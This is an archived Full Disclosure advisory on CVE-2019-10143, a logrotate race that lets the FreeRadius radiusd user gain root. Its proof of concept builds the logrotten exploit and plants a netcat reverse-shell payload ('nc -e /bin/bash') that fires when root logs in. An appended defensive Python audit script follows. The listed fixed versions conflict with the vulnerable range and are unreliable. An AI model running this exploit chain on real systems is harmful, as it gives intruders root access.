[AIT-SA-20191112-01] CVE-2019-10143: Privilege Escalation via Logrotate in FreeRadius


                <!--X-Body-Begin-->
<!--X-User-Header-->
<h2 class="m-list"><a href="/fulldisclosure/">Full Disclosure</a>
mailing list archives</h2>
<!--X-User-Header-End-->
<!--X-TopPNI-->
<!--X-TopPNI-End-->
<!--X-MsgBody-->
<!--X-Subject-Header-Begin-->
<h1 class="m-title">[AIT-SA-20191112-01] CVE-2019-10143: Privilege Escalation via Logrotate in FreeRadius</h1>
<hr>
<!--X-Subject-Header-End-->
<!--X-Head-of-Message-->


<em>From</em>: sec-advisory &lt;sec-advisory () ait ac at&gt;


<em>Date</em>: Fri, 15 Nov 2019 09:05:43 +0000


<!--X-Head-of-Message-End-->
<!--X-Head-Body-Sep-Begin-->
<hr>
<!--X-Head-Body-Sep-End-->
<!--X-Body-of-Message-->
<pre style="margin: 0em;"># Privilege Escalation via Logrotate in FreeRadius

## Overview
Identifier: AIT-SA-20191112-01
Target: FreeRadius
Vendor: FreeRadius
Version: all versions including 3.0.19
Fixed in Version: 12.2.3, 12.1.8 and 12.0.8
CVE: <a rel="nofollow" href="https://nvd.nist.gov/vuln/detail/CVE-2019-10143">https://nvd.nist.gov/vuln/detail/CVE-2019-10143</a>
Accessibility: Local
Severity: Low
Author: Wolfgang Hotwagner (AIT Austrian Institute of Technology)

## Summary
FreeRadius is a modular Open-Source RADIUS suite (<a rel="nofollow" href="https://freeradius.org/">https://freeradius.org/</a>).

## Vulnerability Description
The log directory "radacct" is owned by user "radiusd". Because of an unsafe interaction with logrotate, user "radiusd" 
can elevate its privileges to "root".
User "radiusd" owns the log directory /var/log/radius/radacct:

```
drwx------. 3 radiusd radiusd 4096 26. Apr 16:01 /var/log/radius/radacct/
```
Log files are rotated once a day (or at any other configured frequency) by logrotate, which runs as root. The 
configuration does not use the "su" directive:

```
/var/log/radius/radacct/*/detail {
        monthly
        rotate 4
        nocreate
        missingok
        compress
}
```

Since logrotate is prone to a race condition (see 
<a rel="nofollow" href="https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition">https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition</a>), user "radiusd" can 
replace the directory /var/log/radius/radacct/logdir with a symbolic link to any directory (for example 
/etc/bash_completion.d). logrotate will then place the compressed files AS ROOT into /etc/bash_completion.d and set 
their owner and group to "radiusd.radiusd". An attacker could simply place a reverse shell into this file; as soon 
as root logs in, the reverse shell is executed.

Details of the race-condition in logrotate can be found at:

*   <a rel="nofollow" href="https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition">https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition</a>
*   <a rel="nofollow" href="https://tech.feedyourhead.at/content/abusing-a-race-condition-in-logrotate-to-elevate-privileges">https://tech.feedyourhead.at/content/abusing-a-race-condition-in-logrotate-to-elevate-privileges</a>
*   <a rel="nofollow" href="https://github.com/whotwagner/logrotten">https://github.com/whotwagner/logrotten</a>

## Proof of Concept
The following example illustrates how an attacker who has already gained a shell as user "radiusd" can elevate their 
privileges to "root". After downloading and compiling, the exploit is executed and waits for the next daily run of 
logrotate. If the rotation of the log file succeeds, a new file containing the reverse shell payload is written into 
/etc/bash_completion.d/ with owner "radiusd". As soon as root logs in, the reverse shell is executed and connects 
back to the attacker's netcat listener:

```
radiusd@redhat7:~$ git clone <a rel="nofollow" href="https://github.com/whotwagner/logrotten.git">https://github.com/whotwagner/logrotten.git</a> /tmp/logrotten
Cloning into '/tmp/logrotten'...
remote: Enumerating objects: 84, done.
remote: Counting objects: 100% (84/84), done.
remote: Compressing objects: 100% (58/58), done.
remote: Total 84 (delta 35), reused 64 (delta 24), pack-reused 0
Unpacking objects: 100% (84/84), done.
radiusd@redhat7:~$ mkdir -p /var/log/radius/radacct/logdir
radiusd@redhat7:~$ touch /var/log/radius/radacct/logdir/detail
radiusd@redhat7:~$ cd /tmp/logrotten &amp;&amp; gcc -o logrotten logrotten.c
radiusd@redhat7:/tmp/logrotten$ ./logrotten -c /var/log/radius/radacct/logdir/detail
Waiting for rotating /var/log/radius/radacct/logdir/detail...
Renamed /var/log/radius/radacct/logdir/detail with /var/log/radius/radacct/logdir/detail2 and created symlink to 
/etc/bash_completion.d
Done!
radiusd@redhat7:/tmp/logrotten$ ls -l /etc/bash_completion.d/
total 20
-rw-r--r-- 1 root root 11144 Oct 28  2018 grub
-rw-r--r-- 1 radiusd  radiusd     33 May 12 18:44 detail.1.gz
radiusd@redhat7:/tmp/logrotten$ echo  "if [ \`id -u\` -eq 0 ]; then (/bin/nc -e /bin/bash localhost 3333 &amp;); fi" &gt; 
/etc/bash_completion.d/detail.1.gz
radiusd@redhat7:/tmp/logrotten$ nc -nvlp 3333
listening on [any] 3333 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 55526
id
uid=0(root) gid=0(root) groups=0(root)
```

## Vulnerable Versions
All versions including 3.0.19

## Tested Versions
Name : freeradius
Architecture: x86_64
Version: 3.0.13
Release: 9.el7_5

## Impact
An attacker who has already obtained a valid shell as user "radiusd" could elevate their privileges to "root". The 
fact that another exploit is needed to get that shell lowers the severity from high to low.

## Mitigation
Add "su radiusd:radiusd" to all log sections in /etc/logrotate.d/radiusd.
Keeping SELinux in "Enforcing" mode limits the directories the "radiusd" user can write to.
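Added example (not part of the advisory, FreeRadius or logrotate): a small audit of the kind a defender would run over /etc/logrotate.d to find the condition from the Vulnerability Description, a stanza with no "su" line whose rotation directory is owned by a non-root user, and to apply the Mitigation by inserting the directive (emitted in logrotate's `su user group` form). The sample stanza and the ownership table are constructed from the advisory's listings; on a live host the table would be replaced by a stat()-based lookup.

```python
import posixpath
import re

# Constructed sample: the advisory's /etc/logrotate.d/radiusd stanza, which has no "su" line.
SAMPLE_CONFIG = """\
/var/log/radius/radacct/*/detail {
        monthly
        rotate 4
        nocreate
        missingok
        compress
}
"""
# Constructed ownership table taken from the advisory's listing; use a stat() lookup on a live host.
SAMPLE_OWNERS = {"/var/log/radius/radacct": "radiusd", "/var/log/radius": "root"}
STANZA_RE = re.compile(r"^(?P<paths>[^{}]+)\{(?P<body>.*?)^\}", re.S | re.M)

def parse_stanzas(text):
    """Yield (path patterns, directive lines) per stanza; comment lines are dropped."""
    clean = "\n".join(ln for ln in text.splitlines() if not ln.lstrip().startswith("#"))
    for m in STANZA_RE.finditer(clean):
        yield m.group("paths").split(), [ln.strip() for ln in m.group("body").splitlines() if ln.strip()]

def rotation_dir(pattern):
    """Deepest wildcard-free directory of a pattern (radacct/*/detail gives .../radacct)."""
    d = posixpath.dirname(pattern)
    while any(c in posixpath.basename(d) for c in "*?["):
        d = posixpath.dirname(d)
    return d

def audit(text, owner_of):
    """Return (pattern, owner) for each stanza with no 'su' line whose rotation directory is owned
    by a non-root user: root then renames and compresses inside a directory that user controls."""
    findings = []
    for paths, body in parse_stanzas(text):
        if any(ln.split()[0] == "su" for ln in body):
            continue
        for pat in paths:
            owner = owner_of(rotation_dir(pat))
            if owner not in (None, "root"):
                findings.append((pat, owner))
    return findings

def harden(text, user, group):
    """Return text with 'su user group' inserted as the first directive of each stanza lacking it."""
    def fix(m):
        if re.search(r"^\s*su\s", m.group("body"), re.M):
            return m.group(0)
        return f"{m.group('paths')}{{\n        su {user} {group}{m.group('body')}}}"
    return STANZA_RE.sub(fix, text)
```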

## References
*  <a rel="nofollow" href="https://access.redhat.com/security/cve/cve-2019-10143">https://access.redhat.com/security/cve/cve-2019-10143</a>
*  <a rel="nofollow" href="https://nvd.nist.gov/vuln/detail/CVE-2019-10143">https://nvd.nist.gov/vuln/detail/CVE-2019-10143</a>

## Vendor Contact Timeline

* `2019-05-01` Contacting RedHat
* `2019-05-07` RedHat opens issue at the vendor bugtracker
* `2019-05-23` CVE gets assigned to the issue
* `2019-05-24` FreeRadius is skeptical about the "security" impact
* `2019-11-12` Public disclosure

## Notes
This CVE is disputed because the vendor stated that there is no known remote code execution in FreeRadius that allows 
an attacker to gain a shell as user "radiusd" (<a rel="nofollow" href="https://freeradius.org/security/">https://freeradius.org/security/</a>). CVEs are not only assigned for 
vulnerabilities but also for exposures that give an attacker a stronger impact after a successful attack. 
Therefore we believe that it is important to file this issue as a security related bug.

## Advisory URL
<a rel="nofollow" href="https://www.ait.ac.at/ait-sa-20191112-01-privilege-escalation-via-logrotate-in-freeradius">https://www.ait.ac.at/ait-sa-20191112-01-privilege-escalation-via-logrotate-in-freeradius</a>

_______________________________________________
Sent through the Full Disclosure mailing list
<a rel="nofollow" href="https://nmap.org/mailman/listinfo/fulldisclosure">https://nmap.org/mailman/listinfo/fulldisclosure</a>
Web Archives &amp; RSS: <a rel="nofollow" href="http://seclists.org/fulldisclosure/">http://seclists.org/fulldisclosure/</a>

</pre>
<!--X-Body-of-Message-End-->
<!--X-MsgBody-End-->
<!--X-Follow-Ups-->
<hr>
<!--X-Follow-Ups-End-->
<!--X-References-->
<!--X-References-End-->
<!--X-BotPNI-->
<!--X-BotPNI-End-->
<!--X-User-Footer-->
<!--X-User-Footer-End-->
<p>